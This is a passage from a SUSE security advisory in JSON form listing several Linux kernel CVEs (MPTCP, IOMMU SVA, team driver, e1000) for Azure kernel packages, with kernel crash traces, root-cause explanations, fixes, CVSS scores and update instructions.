"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fallback earlier on simult connection\n\nSyzkaller reports a simult-connect race leading to inconsistent fallback\nstatus:\n\n WARNING: CPU: 3 PID: 33 at net/mptcp/subflow.c:1515 subflow_data_ready+0x40b/0x7c0 net/mptcp/subflow.c:1515\n Modules linked in:\n CPU: 3 UID: 0 PID: 33 Comm: ksoftirqd/3 Not tainted syzkaller #0 PREEMPT(full)\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\n RIP: 0010:subflow_data_ready+0x40b/0x7c0 net/mptcp/subflow.c:1515\n Code: 89 ee e8 78 61 3c f6 40 84 ed 75 21 e8 8e 66 3c f6 44 89 fe bf 07 00 00 00 e8 c1 61 3c f6 41 83 ff 07 74 09 e8 76 66 3c f6 90 \u003c0f\u003e 0b 90 e8 6d 66 3c f6 48 89 df e8 e5 ad ff ff 31 ff 89 c5 89 c6\n RSP: 0018:ffffc900006cf338 EFLAGS: 00010246\n RAX: 0000000000000000 RBX: ffff888031acd100 RCX: ffffffff8b7f2abf\n RDX: ffff88801e6ea440 RSI: ffffffff8b7f2aca RDI: 0000000000000005\n RBP: 0000000000000000 R08: 0000000000000005 R09: 0000000000000007\n R10: 0000000000000004 R11: 0000000000002c10 R12: ffff88802ba69900\n R13: 1ffff920000d9e67 R14: ffff888046f81800 R15: 0000000000000004\n FS: 0000000000000000(0000) GS:ffff8880d69bc000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000560fc0ca1670 CR3: 0000000032c3a000 CR4: 0000000000352ef0\n Call Trace:\n \u003cTASK\u003e\n tcp_data_queue+0x13b0/0x4f90 net/ipv4/tcp_input.c:5197\n tcp_rcv_state_process+0xfdf/0x4ec0 net/ipv4/tcp_input.c:6922\n tcp_v6_do_rcv+0x492/0x1740 net/ipv6/tcp_ipv6.c:1672\n tcp_v6_rcv+0x2976/0x41e0 net/ipv6/tcp_ipv6.c:1918\n ip6_protocol_deliver_rcu+0x188/0x1520 net/ipv6/ip6_input.c:438\n ip6_input_finish+0x1e4/0x4b0 net/ipv6/ip6_input.c:489\n NF_HOOK include/linux/netfilter.h:318 [inline]\n NF_HOOK include/linux/netfilter.h:312 [inline]\n ip6_input+0x105/0x2f0 net/ipv6/ip6_input.c:500\n dst_input include/net/dst.h:471 [inline]\n ip6_rcv_finish net/ipv6/ip6_input.c:79 [inline]\n NF_HOOK include/linux/netfilter.h:318 [inline]\n NF_HOOK include/linux/netfilter.h:312 [inline]\n ipv6_rcv+0x264/0x650 net/ipv6/ip6_input.c:311\n __netif_receive_skb_one_core+0x12d/0x1e0 net/core/dev.c:5979\n __netif_receive_skb+0x1d/0x160 net/core/dev.c:6092\n process_backlog+0x442/0x15e0 net/core/dev.c:6444\n __napi_poll.constprop.0+0xba/0x550 net/core/dev.c:7494\n napi_poll net/core/dev.c:7557 [inline]\n net_rx_action+0xa9f/0xfe0 net/core/dev.c:7684\n handle_softirqs+0x216/0x8e0 kernel/softirq.c:579\n run_ksoftirqd kernel/softirq.c:968 [inline]\n run_ksoftirqd+0x3a/0x60 kernel/softirq.c:960\n smpboot_thread_fn+0x3f7/0xae0 kernel/smpboot.c:160\n kthread+0x3c2/0x780 kernel/kthread.c:463\n ret_from_fork+0x5d7/0x6f0 arch/x86/kernel/process.c:148\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n \u003c/TASK\u003e\n\nThe TCP subflow can process the simult-connect syn-ack packet after\ntransitioning to TCP_FIN1 state, bypassing the MPTCP fallback check,\nas the sk_state_change() callback is not invoked for * -\u003e FIN_WAIT1\ntransitions.\n\nThat will move the msk socket to an inconsistent status and the next\nincoming data will hit the reported splat.\n\nClose the race moving the simult-fallback check at the earliest possible\nstage - that is at syn-ack generation time.\n\nAbout the fixes tags: [2] was supposed to also fix this issue introduced\nby [3]. [1] is required as a dependence: it was not explicitly marked as\na fix, but it is one and it has already been backported before [3]. In\nother words, this commit should be backported up to [3], including [2]\nand [1] if that\u0027s not already there.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71088",
"url": "https://www.suse.com/security/cve/CVE-2025-71088"
},
{
"category": "external",
"summary": "SUSE Bug 1256630 for CVE-2025-71088",
"url": "https://bugzilla.suse.com/1256630"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71088"
},
{
"cve": "CVE-2025-71089",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71089"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niommu: disable SVA when CONFIG_X86 is set\n\nPatch series \"Fix stale IOTLB entries for kernel address space\", v7.\n\nThis proposes a fix for a security vulnerability related to IOMMU Shared\nVirtual Addressing (SVA). In an SVA context, an IOMMU can cache kernel\npage table entries. When a kernel page table page is freed and\nreallocated for another purpose, the IOMMU might still hold stale,\nincorrect entries. This can be exploited to cause a use-after-free or\nwrite-after-free condition, potentially leading to privilege escalation or\ndata corruption.\n\nThis solution introduces a deferred freeing mechanism for kernel page\ntable pages, which provides a safe window to notify the IOMMU to\ninvalidate its caches before the page is reused.\n\n\nThis patch (of 8):\n\nIn the IOMMU Shared Virtual Addressing (SVA) context, the IOMMU hardware\nshares and walks the CPU\u0027s page tables. The x86 architecture maps the\nkernel\u0027s virtual address space into the upper portion of every process\u0027s\npage table. Consequently, in an SVA context, the IOMMU hardware can walk\nand cache kernel page table entries.\n\nThe Linux kernel currently lacks a notification mechanism for kernel page\ntable changes, specifically when page table pages are freed and reused. \nThe IOMMU driver is only notified of changes to user virtual address\nmappings. This can cause the IOMMU\u0027s internal caches to retain stale\nentries for kernel VA.\n\nUse-After-Free (UAF) and Write-After-Free (WAF) conditions arise when\nkernel page table pages are freed and later reallocated. The IOMMU could\nmisinterpret the new data as valid page table entries. The IOMMU might\nthen walk into attacker-controlled memory, leading to arbitrary physical\nmemory DMA access or privilege escalation. This is also a\nWrite-After-Free issue, as the IOMMU will potentially continue to write\nAccessed and Dirty bits to the freed memory while attempting to walk the\nstale page tables.\n\nCurrently, SVA contexts are unprivileged and cannot access kernel\nmappings. However, the IOMMU will still walk kernel-only page tables all\nthe way down to the leaf entries, where it realizes the mapping is for the\nkernel and errors out. This means the IOMMU still caches these\nintermediate page table entries, making the described vulnerability a real\nconcern.\n\nDisable SVA on x86 architecture until the IOMMU can receive notification\nto flush the paging cache before freeing the CPU kernel page table pages.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71089",
"url": "https://www.suse.com/security/cve/CVE-2025-71089"
},
{
"category": "external",
"summary": "SUSE Bug 1256612 for CVE-2025-71089",
"url": "https://bugzilla.suse.com/1256612"
},
{
"category": "external",
"summary": "SUSE Bug 1256615 for CVE-2025-71089",
"url": "https://bugzilla.suse.com/1256615"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "important"
}
],
"title": "CVE-2025-71089"
},
{
"cve": "CVE-2025-71091",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71091"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nteam: fix check for port enabled in team_queue_override_port_prio_changed()\n\nThere has been a syzkaller bug reported recently with the following\ntrace:\n\nlist_del corruption, ffff888058bea080-\u003eprev is LIST_POISON2 (dead000000000122)\n------------[ cut here ]------------\nkernel BUG at lib/list_debug.c:59!\nOops: invalid opcode: 0000 [#1] SMP KASAN NOPTI\nCPU: 3 UID: 0 PID: 21246 Comm: syz.0.2928 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\nRIP: 0010:__list_del_entry_valid_or_report+0x13e/0x200 lib/list_debug.c:59\nCode: 48 c7 c7 e0 71 f0 8b e8 30 08 ef fc 90 0f 0b 48 89 ef e8 a5 02 55 fd 48 89 ea 48 89 de 48 c7 c7 40 72 f0 8b e8 13 08 ef fc 90 \u003c0f\u003e 0b 48 89 ef e8 88 02 55 fd 48 89 ea 48 b8 00 00 00 00 00 fc ff\nRSP: 0018:ffffc9000d49f370 EFLAGS: 00010286\nRAX: 000000000000004e RBX: ffff888058bea080 RCX: ffffc9002817d000\nRDX: 0000000000000000 RSI: ffffffff819becc6 RDI: 0000000000000005\nRBP: dead000000000122 R08: 0000000000000005 R09: 0000000000000000\nR10: 0000000080000000 R11: 0000000000000001 R12: ffff888039e9c230\nR13: ffff888058bea088 R14: ffff888058bea080 R15: ffff888055461480\nFS: 00007fbbcfe6f6c0(0000) GS:ffff8880d6d0a000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 000000110c3afcb0 CR3: 00000000382c7000 CR4: 0000000000352ef0\nCall Trace:\n \u003cTASK\u003e\n __list_del_entry_valid include/linux/list.h:132 [inline]\n __list_del_entry include/linux/list.h:223 [inline]\n list_del_rcu include/linux/rculist.h:178 [inline]\n __team_queue_override_port_del drivers/net/team/team_core.c:826 [inline]\n __team_queue_override_port_del drivers/net/team/team_core.c:821 [inline]\n team_queue_override_port_prio_changed drivers/net/team/team_core.c:883 [inline]\n team_priority_option_set+0x171/0x2f0 drivers/net/team/team_core.c:1534\n team_option_set drivers/net/team/team_core.c:376 [inline]\n team_nl_options_set_doit+0x8ae/0xe60 drivers/net/team/team_core.c:2653\n genl_family_rcv_msg_doit+0x209/0x2f0 net/netlink/genetlink.c:1115\n genl_family_rcv_msg net/netlink/genetlink.c:1195 [inline]\n genl_rcv_msg+0x55c/0x800 net/netlink/genetlink.c:1210\n netlink_rcv_skb+0x158/0x420 net/netlink/af_netlink.c:2552\n genl_rcv+0x28/0x40 net/netlink/genetlink.c:1219\n netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline]\n netlink_unicast+0x5aa/0x870 net/netlink/af_netlink.c:1346\n netlink_sendmsg+0x8c8/0xdd0 net/netlink/af_netlink.c:1896\n sock_sendmsg_nosec net/socket.c:727 [inline]\n __sock_sendmsg net/socket.c:742 [inline]\n ____sys_sendmsg+0xa98/0xc70 net/socket.c:2630\n ___sys_sendmsg+0x134/0x1d0 net/socket.c:2684\n __sys_sendmsg+0x16d/0x220 net/socket.c:2716\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xcd/0xfa0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nThe problem is in this flow:\n1) Port is enabled, queue_id != 0, in qom_list\n2) Port gets disabled\n -\u003e team_port_disable()\n -\u003e team_queue_override_port_del()\n -\u003e del (removed from list)\n3) Port is disabled, queue_id != 0, not in any list\n4) Priority changes\n -\u003e team_queue_override_port_prio_changed()\n -\u003e checks: port disabled \u0026\u0026 queue_id != 0\n -\u003e calls del - hits the BUG as it is removed already\n\nTo fix this, change the check in team_queue_override_port_prio_changed()\nso it returns early if port is not enabled.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71091",
"url": "https://www.suse.com/security/cve/CVE-2025-71091"
},
{
"category": "external",
"summary": "SUSE Bug 1256773 for CVE-2025-71091",
"url": "https://bugzilla.suse.com/1256773"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71091"
},
{
"cve": "CVE-2025-71093",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71093"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ne1000: fix OOB in e1000_tbi_should_accept()\n\nIn e1000_tbi_should_accept() we read the last byte of the frame via\n\u0027data[length - 1]\u0027 to evaluate the TBI workaround. If the descriptor-\nreported length is zero or larger than the actual RX buffer size, this\nread goes out of bounds and can hit unrelated slab objects. The issue\nis observed from the NAPI receive path (e1000_clean_rx_irq):\n\n==================================================================\nBUG: KASAN: slab-out-of-bounds in e1000_tbi_should_accept+0x610/0x790\nRead of size 1 at addr ffff888014114e54 by task sshd/363\n\nCPU: 0 PID: 363 Comm: sshd Not tainted 5.18.0-rc1 #1\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.12.0-59-gc9ba5276e321-prebuilt.qemu.org 04/01/2014\nCall Trace:\n \u003cIRQ\u003e\n dump_stack_lvl+0x5a/0x74\n print_address_description+0x7b/0x440\n print_report+0x101/0x200\n kasan_report+0xc1/0xf0\n e1000_tbi_should_accept+0x610/0x790\n e1000_clean_rx_irq+0xa8c/0x1110\n e1000_clean+0xde2/0x3c10\n __napi_poll+0x98/0x380\n net_rx_action+0x491/0xa20\n __do_softirq+0x2c9/0x61d\n do_softirq+0xd1/0x120\n \u003c/IRQ\u003e\n \u003cTASK\u003e\n __local_bh_enable_ip+0xfe/0x130\n ip_finish_output2+0x7d5/0xb00\n __ip_queue_xmit+0xe24/0x1ab0\n __tcp_transmit_skb+0x1bcb/0x3340\n tcp_write_xmit+0x175d/0x6bd0\n __tcp_push_pending_frames+0x7b/0x280\n tcp_sendmsg_locked+0x2e4f/0x32d0\n tcp_sendmsg+0x24/0x40\n sock_write_iter+0x322/0x430\n vfs_write+0x56c/0xa60\n ksys_write+0xd1/0x190\n do_syscall_64+0x43/0x90\n entry_SYSCALL_64_after_hwframe+0x44/0xae\nRIP: 0033:0x7f511b476b10\nCode: 73 01 c3 48 8b 0d 88 d3 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 0f 1f 44 00 00 83 3d f9 2b 2c 00 00 75 10 b8 01 00 00 00 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 31 c3 48 83 ec 08 e8 8e 9b 01 00 48 89 04 24\nRSP: 002b:00007ffc9211d4e8 EFLAGS: 00000246 ORIG_RAX: 0000000000000001\nRAX: ffffffffffffffda RBX: 0000000000004024 RCX: 00007f511b476b10\nRDX: 0000000000004024 RSI: 0000559a9385962c RDI: 0000000000000003\nRBP: 0000559a9383a400 R08: fffffffffffffff0 R09: 0000000000004f00\nR10: 0000000000000070 R11: 0000000000000246 R12: 0000000000000000\nR13: 00007ffc9211d57f R14: 0000559a9347bde7 R15: 0000000000000003\n \u003c/TASK\u003e\nAllocated by task 1:\n __kasan_krealloc+0x131/0x1c0\n krealloc+0x90/0xc0\n add_sysfs_param+0xcb/0x8a0\n kernel_add_sysfs_param+0x81/0xd4\n param_sysfs_builtin+0x138/0x1a6\n param_sysfs_init+0x57/0x5b\n do_one_initcall+0x104/0x250\n do_initcall_level+0x102/0x132\n do_initcalls+0x46/0x74\n kernel_init_freeable+0x28f/0x393\n kernel_init+0x14/0x1a0\n ret_from_fork+0x22/0x30\nThe buggy address belongs to the object at ffff888014114000\n which belongs to the cache kmalloc-2k of size 2048\nThe buggy address is located 1620 bytes to the right of\n 2048-byte region [ffff888014114000, ffff888014114800]\nThe buggy address belongs to the physical page:\npage:ffffea0000504400 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x14110\nhead:ffffea0000504400 order:3 compound_mapcount:0 compound_pincount:0\nflags: 0x100000000010200(slab|head|node=0|zone=1)\nraw: 0100000000010200 0000000000000000 dead000000000001 ffff888013442000\nraw: 0000000000000000 0000000000080008 00000001ffffffff 0000000000000000\npage dumped because: kasan: bad access detected\n==================================================================\n\nThis happens because the TBI check unconditionally dereferences the last\nbyte without validating the reported length first:\n\n\tu8 last_byte = *(data + length - 1);\n\nFix by rejecting the frame early if the length is zero, or if it exceeds\nadapter-\u003erx_buffer_len. This preserves the TBI workaround semantics for\nvalid frames and prevents touching memory beyond the RX buffer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71093",
"url": "https://www.suse.com/security/cve/CVE-2025-71093"
},
{
"category": "external",
"summary": "SUSE Bug 1256777 for CVE-2025-71093",
"url": "https://bugzilla.suse.com/1256777"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71093"
},
{
"cve": "CVE-2025-71094",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71094"
}
],
"notes": [
{
"category": "general",
